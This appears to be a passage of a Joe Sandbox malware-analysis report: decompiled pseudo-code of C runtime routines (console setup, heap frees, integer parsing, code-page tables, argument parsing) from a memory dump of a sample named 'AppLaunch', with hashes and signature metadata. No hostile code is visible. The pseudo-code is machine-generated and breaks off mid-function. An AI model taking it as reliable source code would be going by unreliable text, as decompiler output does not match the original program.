Part of subcall function 0043D4A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0043D4D4,0043C4CF,00000000,?,004389BE,?,00000000,00000000,?), ref: 0043D4B8

WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,0043C4E2,00000000,00000001,00000000,00000000,?,004389BE,?,00000000,00000000,?), ref: 0043D542

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d9c8b520074f0ab4f116300be5a926b2518d5a020515c153e60a2e694f731f09
Instruction ID: 6437d6ce40b26b6857a4ba526d0f2e98b5c513bef8eccead1f251fbbae70a34e
Opcode Fuzzy Hash: d9c8b520074f0ab4f116300be5a926b2518d5a020515c153e60a2e694f731f09
Instruction Fuzzy Hash: 30F03036801124BBCF622F92FC09E8A3F36FB493B5F019021FE0996130D63288209B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402A01 Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00402A01(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				signed int _t34;

				_t31 = _t34 - 0x4a0;
				E00406430(_t34 - 0x496, __eflags, _t34 - 0x4a0);
				E00406490(_t34 - 0x497, __eflags, _t34 - 0x4a4);
				E00416980(_t34 - 0x420);
				E00416980(_t34 - 0x438);
				 *((char*)(_t34 - 0x48b)) = 0;
				E00416980(__ebx + 8);
				E00416980(__ebx + 0x20);
				_t19 =  *((intOrPtr*)(_t34 - 0x48b));
				return E00424900(_t19, __ebx,  *(_t34 - 4) ^ _t34, _t31, __edi, __esi);
			}

0x00402b98
0x00402ba5
0x00402bb7
0x00402bc2
0x00402bcd
0x00402bd2
0x00402bdc
0x00402be4
0x00402be9
0x00402bff

APIs

task.LIBCPMTD ref: 00402BC2
task.LIBCPMTD ref: 00402BCD
task.LIBCPMTD ref: 00402BDC
task.LIBCPMTD ref: 00402BE4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: b0bc4e28727911b728c3e14dfd8145462128827dbf9cf9f28aa5402f026a17ff
Instruction ID: a3463ac5c4213f78cc3502f6b5f83bbb3a72b80e599b725d6e6fd1d9f57862ca
Opcode Fuzzy Hash: b0bc4e28727911b728c3e14dfd8145462128827dbf9cf9f28aa5402f026a17ff
Instruction Fuzzy Hash: 4BF0BDF15640188BCB14EB11D8916EDB778AF55308F8101EEE54A26192DF386F84DFAD

Uniqueness

Uniqueness Score: -1.00%

Function 004028B0 Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004028B0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				void* _t27;
				signed int _t30;

				_t27 = __edx;
				E00406490(_t30 - 0x497, __eflags, _t30 - 0x4a4);
				E00416980(_t30 - 0x420);
				E00416980(_t30 - 0x438);
				 *((char*)(_t30 - 0x48b)) = 0;
				E00416980(__ebx + 8);
				E00416980(__ebx + 0x20);
				_t16 =  *((intOrPtr*)(_t30 - 0x48b));
				return E00424900(_t16, __ebx,  *(_t30 - 4) ^ _t30, _t27, __edi, __esi);
			}

0x004028b0
0x00402bb7
0x00402bc2
0x00402bcd
0x00402bd2
0x00402bdc
0x00402be4
0x00402be9
0x00402bff

APIs

task.LIBCPMTD ref: 00402BC2
task.LIBCPMTD ref: 00402BCD
task.LIBCPMTD ref: 00402BDC
task.LIBCPMTD ref: 00402BE4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 2c41201c2e4025c7c69dc8fc2cf11b0b16171f99f5d0393b608887c494faeec0
Instruction ID: b591573085bb869653347159709540a117d53572e6bb1d42d5a2e270a160c4e9
Opcode Fuzzy Hash: 2c41201c2e4025c7c69dc8fc2cf11b0b16171f99f5d0393b608887c494faeec0
Instruction Fuzzy Hash: CCF0F8B15640188BCB14EB21D8916EDB738AF14308F8101EEA94A26192DF386B84DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00431D4F Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431D4F() {

				E00432BD6( *0x4c7558);
				 *0x4c7558 = 0;
				E00432BD6( *0x4c755c);
				 *0x4c755c = 0;
				E00432BD6( *0x4c7784);
				 *0x4c7784 = 0;
				E00432BD6( *0x4c7788);
				 *0x4c7788 = 0;
				return 1;
			}

0x00431d58
0x00431d65
0x00431d6b
0x00431d76
0x00431d7c
0x00431d87
0x00431d8d
0x00431d95
0x00431d9e

APIs

_free.LIBCMT ref: 00431D58

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

_free.LIBCMT ref: 00431D6B
_free.LIBCMT ref: 00431D7C
_free.LIBCMT ref: 00431D8D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11c02fdb56068587537b8a24c5e2e919e89d8f42c6ae6c34fc75d160ba8fbdd0
Instruction ID: 56a87c94af4490395b7d35447df329d6dbcf0d32e93ba05c092bb87d7a41afc5
Opcode Fuzzy Hash: 11c02fdb56068587537b8a24c5e2e919e89d8f42c6ae6c34fc75d160ba8fbdd0
Instruction Fuzzy Hash: DDE04671819160ABC6D27F1AFD01C897F61F708714700202BF01022A31E6B920A2AF8D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D36C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042D36C(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E0042C9A6( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E0042A0B3( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E0042C9E3(_t129, _t149, _t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E0043EE00(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E00424910(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E0042C94F( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E0042CB00(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E00429369(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E0042C94F( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E00429369(_t156))) = 0x16;
					E0042928F();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x0042d381
0x0042d3a4
0x0042d3a6
0x0042d3a8
0x0042d3aa
0x0042d3aa
0x0042d3af
0x0042d3b4
0x0042d3b4
0x0042d3be
0x0042d3be
0x0042d383
0x0042d388
0x0042d3bf
0x0042d3c5
0x0042d3ca
0x0042d3cd
0x0042d3cf
0x0042d3d2
0x0042d3d4
0x0042d3dc
0x0042d3dc
0x0042d3df
0x0042d3ec
0x0042d3ef
0x0042d3f2
0x0042d3f7
0x0042d3fa
0x0042d3fc
0x0042d3d9
0x00000000
0x0042d3d9
0x0042d3fe
0x0042d402
0x0042d405
0x0042d408
0x0042d412
0x0042d415
0x0042d428
0x00000000
0x0042d428
0x00000000
0x0042d40a
0x0042d40d
0x0042d417
0x0042d417
0x0042d41a
0x0042d41c
0x0042d41d
0x0042d420
0x0042d423
0x0042d42b
0x0042d42b
0x0042d42e
0x0042d430
0x0042d43b
0x0042d43f
0x0042d441
0x0042d44f
0x0042d451
0x0042d45d
0x0042d45f
0x0042d461
0x0042d46b
0x0042d46b
0x0042d463
0x0042d466
0x0042d466
0x0042d453
0x0042d456
0x0042d456
0x0042d443
0x0042d446
0x0042d446
0x0042d46e
0x0042d470
0x0042d47e
0x0042d480
0x0042d481
0x0042d484
0x0042d487
0x0042d489
0x0042d4aa
0x0042d4aa
0x0042d4ac
0x0042d4ae
0x0042d4ae
0x0042d4b5
0x0042d4b7
0x0042d4ba
0x0042d4c0
0x0042d4a5
0x0042d4a5
0x0042d4c7
0x0042d4c7
0x0042d4c8
0x0042d4c9
0x0042d4cb
0x0042d4d4
0x0042d4d7
0x0042d4dc
0x0042d4e1
0x0042d4e4
0x0042d4e7
0x0042d4ea
0x0042d4ed
0x0042d4f0
0x0042d4f4
0x0042d4f6
0x0042d504
0x0042d506
0x0042d514
0x0042d516
0x0042d520
0x0042d520
0x0042d518
0x0042d51b
0x0042d51b
0x0042d508
0x0042d50b
0x0042d50b
0x0042d4f8
0x0042d4fb
0x0042d4fb
0x0042d523
0x0042d526
0x0042d529
0x00000000
0x00000000
0x0042d52b
0x0042d52e
0x00000000
0x00000000
0x0042d530
0x0042d533
0x0042d536
0x0042d538
0x0042d55d
0x0042d55d
0x0042d560
0x0042d568
0x0042d570
0x0042d572
0x0042d575
0x0042d577
0x0042d577
0x0042d57a
0x0042d57d
0x0042d580
0x0042d583
0x00000000
0x0042d583
0x0042d53a
0x0042d53d
0x0042d543
0x0042d543
0x0042d545
0x0042d558
0x0042d558
0x00000000
0x0042d558
0x0042d547
0x0042d54a
0x00000000
0x00000000
0x0042d54c
0x0042d54f
0x00000000
0x00000000
0x0042d551
0x00000000
0x00000000
0x0042d553
0x0042d556
0x00000000
0x00000000
0x00000000
0x0042d556
0x0042d53f
0x0042d541
0x00000000
0x00000000
0x00000000
0x0042d541
0x0042d591
0x0042d594
0x0042d599
0x0042d59c
0x0042d5a8
0x0042d5b8
0x0042d5ba
0x0042d5ed
0x0042d5f1
0x0042d5f3
0x0042d5f5
0x0042d5f7
0x0042d5f7
0x0042d5f9
0x0042d5f9
0x0042d5fd
0x0042d606
0x0042d606
0x00000000
0x0042d5fd
0x0042d5c1
0x0042d5c7
0x0042d5ca
0x0042d5cc
0x0042d5d6
0x0042d5d8
0x0042d5e1
0x0042d5e1
0x0042d5e4
0x0042d5da
0x0042d5da
0x0042d5da
0x0042d5e9
0x0042d5e9
0x00000000
0x0042d5e9
0x0042d5ce
0x0042d5d1
0x00000000
0x0042d5d1
0x0042d5a1
0x0042d5a3
0x00000000
0x0042d5a3
0x0042d48b
0x0042d48d
0x00000000
0x00000000
0x0042d48f
0x0042d491
0x0042d493
0x0042d493
0x0042d4a0
0x00000000
0x0042d4a0
0x0042d472
0x0042d474
0x0042d4c5
0x0042d4c5
0x00000000
0x0042d4c5
0x0042d478
0x0042d479
0x00000000
0x0042d479
0x0042d432
0x0042d435
0x00000000
0x00000000
0x00000000
0x0042d435
0x0042d408
0x0042d38d
0x0042d394
0x0042d399
0x0042d39f
0x00000000
0x0042d39f
0x0042d38f
0x0042d392
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 0042D4D7

Strings

+, xrefs: 0042D412
-, xrefs: 0042D405

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 9819632d86941b0cfb03612fe7bf8c9f8ee68696c58b0204790e75ad78745836
Instruction ID: e023bceeed0c3025ecddba51d096ef9f5f9a2abaf5612c14a587a4ee52c73ab2
Opcode Fuzzy Hash: 9819632d86941b0cfb03612fe7bf8c9f8ee68696c58b0204790e75ad78745836
Instruction Fuzzy Hash: C5914970F04129AFCF14DF69E4806FEBBB0EF16324F94825BE86197390C2789946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00436A3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00436A3D(void* __edx, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				signed int _t92;

				_t60 =  *0x4c61a4; // 0x8656a166
				_v8 = _t60 ^ _t92;
				_t2 =  &_a4; // 0x436e62
				_t91 =  *_t2;
				if( *(_t91 + 4) == 0xfde9 || GetCPInfo( *(_t91 + 4),  &_v1820) == 0) {
					_t81 = 0;
					__eflags = 0;
					_t90 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t89 = _t46;
						_t47 = _t89 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t89 - 0x19;
							if(_t89 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t91 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t90;
					} while (_t82 < _t90);
					goto L26;
				} else {
					_t81 = 0;
					_t90 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t92 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t100 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t89 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t89;
							if(_t70 > _t89) {
								break;
							}
							__eflags = _t70 - _t90;
							if(_t70 >= _t90) {
								break;
							}
							 *((char*)(_t92 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					E00437886(_t89, _t100, _t81, 1,  &_v264, _t90,  &_v1800,  *(_t91 + 4), _t81);
					E0043C0EE(_t100, _t81,  *((intOrPtr*)(_t91 + 0x21c)), _t90,  &_v264, _t90,  &_v520, _t90,  *(_t91 + 4), _t81);
					E0043C0EE(_t100, _t81,  *((intOrPtr*)(_t91 + 0x21c)), 0x200,  &_v264, _t90,  &_v776, _t90,  *(_t91 + 4), _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t92 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x304));
							}
						} else {
							 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x204));
						}
						 *(_t91 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t90);
					L26:
					return E00424900(_t63, _t81, _v8 ^ _t92, _t89, _t90, _t91);
				}
			}

0x00436a48
0x00436a4f
0x00436a54
0x00436a54
0x00436a5f
0x00436b71
0x00436b71
0x00436b73
0x00436b78
0x00436b7a
0x00436b7a
0x00436b7a
0x00436b7d
0x00436b80
0x00436b83
0x00436b8f
0x00436b92
0x00436ba0
0x00436b94
0x00436b97
0x00436b9b
0x00436b9b
0x00436b9b
0x00436b85
0x00436b85
0x00436b8a
0x00436b8a
0x00436b8a
0x00436ba2
0x00436ba9
0x00436baa
0x00436baa
0x00000000
0x00436a7d
0x00436a7d
0x00436a7f
0x00436a84
0x00436a86
0x00436a86
0x00436a8d
0x00436a8e
0x00436a92
0x00436a98
0x00436a9e
0x00436ac6
0x00436ac6
0x00436ac8
0x00000000
0x00000000
0x00436aa7
0x00436aab
0x00436abd
0x00436abd
0x00436abf
0x00000000
0x00000000
0x00436ab0
0x00436ab2
0x00000000
0x00000000
0x00436ab4
0x00436abc
0x00436abc
0x00436abc
0x00436ac1
0x00436ac1
0x00436ac4
0x00436ac4
0x00436ae0
0x00436b01
0x00436b29
0x00436b31
0x00436b33
0x00436b33
0x00436b3e
0x00436b4e
0x00436b51
0x00436b61
0x00436b53
0x00436b53
0x00436b58
0x00436b58
0x00436b40
0x00436b40
0x00436b45
0x00436b45
0x00436b63
0x00436b6a
0x00436b6b
0x00436bae
0x00436bbc
0x00436bbc

APIs

GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 00436A6F

Strings

, xrefs: 00436AB4
bnC, xrefs: 00436A54

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Info
String ID: $bnC
API String ID: 1807457897-2001447229
Opcode ID: 9f780a5ac79f132be60b55bf7824201bf4046650ea346acbb40145f4b5df3523
Instruction ID: a33f83d94117ea08322909c43d9b91e8fec682e93e319b2404fd26e727d325d9
Opcode Fuzzy Hash: 9f780a5ac79f132be60b55bf7824201bf4046650ea346acbb40145f4b5df3523
Instruction Fuzzy Hash: 78413A70504259AFDB218B18CD84BF7BBFDDB49304F2894AEE5CAC7142D238A9459F68

Uniqueness

Uniqueness Score: -1.00%

Function 00431131 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00431131(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00436D71(_t48);
						E00435E79(_t48, _t57, 0, 0x4c71b8, 0, 0x4c71b8, 0x104);
						_t26 =  *0x4c778c; // 0x4d53640
						 *0x4c777c = 0x4c71b8;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x4c71b8;
							_v20 = 0x4c71b8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E004313DB(E00431267( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00431267( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0043684E(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x4c7780 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x4c7784 = _t58;
											L18:
											E00432BD6(_t37);
											_v12 = 0;
											L19:
											E00432BD6(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x4c7780 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x4c7784 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00429369(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00429369(__eflags);
